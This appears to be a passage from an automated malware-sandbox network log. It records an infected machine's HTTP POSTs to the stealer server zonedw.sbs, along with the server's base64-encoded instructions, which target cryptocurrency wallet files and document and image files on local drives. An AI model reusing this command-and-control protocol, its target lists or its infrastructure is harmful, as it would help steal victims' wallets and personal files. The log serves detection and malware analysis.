                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                74192.168.2.450485116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZMYUKN7900ZU37YMY5FK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ZMYUKN7900ZU37YMY5FKCont
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:18 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                75192.168.2.450486116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:20 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECBASJEKF37QIEU37QQI
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ECBASJEKF37QIEU37QQICont
                                                                                                                                                                                                                                                2024-12-13 12:55:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:21 UTC536INData Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55
                                                                                                                                                                                                                                                Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                76192.168.2.450488116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:22 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----79H47QI5FCBIE3E3OPZM
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1157
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:22 UTC1157OUTData Raw: 2d 2d 2d 2d 2d 2d 37 39 48 34 37 51 49 35 46 43 42 49 45 33 45 33 4f 50 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 51 49 35 46 43 42 49 45 33 45 33 4f 50 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 51 49 35 46 43 42 49 45 33 45 33 4f 50 5a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------79H47QI5FCBIE3E3OPZMContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------79H47QI5FCBIE3E3OPZMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------79H47QI5FCBIE3E3OPZMCont
                                                                                                                                                                                                                                                2024-12-13 12:55:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                77192.168.2.450489116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:24 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9HVAI58YMYMYU379R9HD
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1157
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:24 UTC1157OUTData Raw: 2d 2d 2d 2d 2d 2d 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------9HVAI58YMYMYU379R9HDContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------9HVAI58YMYMYU379R9HDContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9HVAI58YMYMYU379R9HDCont
                                                                                                                                                                                                                                                2024-12-13 12:55:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                78192.168.2.450491116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:26 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----N7Q9R1VKF37QQIEKNOZM
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1157
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:26 UTC1157OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 37 51 39 52 31 56 4b 46 33 37 51 51 49 45 4b 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 39 52 31 56 4b 46 33 37 51 51 49 45 4b 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 39 52 31 56 4b 46 33 37 51 51 49 45 4b 4e 4f 5a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------N7Q9R1VKF37QQIEKNOZMContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------N7Q9R1VKF37QQIEKNOZMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------N7Q9R1VKF37QQIEKNOZMCont
                                                                                                                                                                                                                                                2024-12-13 12:55:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:27 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                79192.168.2.450492116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:27 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----T26XT2VAAAAAAAIM7GDB
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1157
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
